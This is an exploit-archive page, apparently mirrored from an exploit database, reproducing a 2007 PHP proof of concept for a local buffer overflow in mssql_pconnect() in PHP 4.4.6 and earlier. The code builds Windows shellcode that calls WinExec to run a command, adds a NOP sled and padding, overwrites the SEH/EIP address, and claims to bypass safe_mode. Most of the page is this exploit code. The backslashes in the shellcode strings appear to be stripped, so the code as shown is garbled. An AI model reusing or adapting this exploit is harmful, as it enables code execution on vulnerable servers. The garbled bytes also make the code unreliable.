PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit
# Published : 2007-03-05
# Author : rgod
# Previous Title : PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit
# Next Title : PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak

<?php

// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow
// poc exploit (and safe_mode bypass)
// windows 2000 sp3 en / seh overwrite
// by rgod
// site: http://retrogod.altervista.org

// u can easily adjust for php5
// this as my little contribute to MOPB

$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbxcax73xe9x77". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbx5cxcfxe9x77". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

   $eip="xdcxf5x12";
   $____suntzu=str_repeat("x90",100);
   $____suntzu.=$____scode;
   $____suntzu.=str_repeat("a",2460 - strlen($____scode));
   $____suntzu.=$eip;
   mssql_pconnect($____suntzu);

?>

# www.Syue.com [2007-03-05]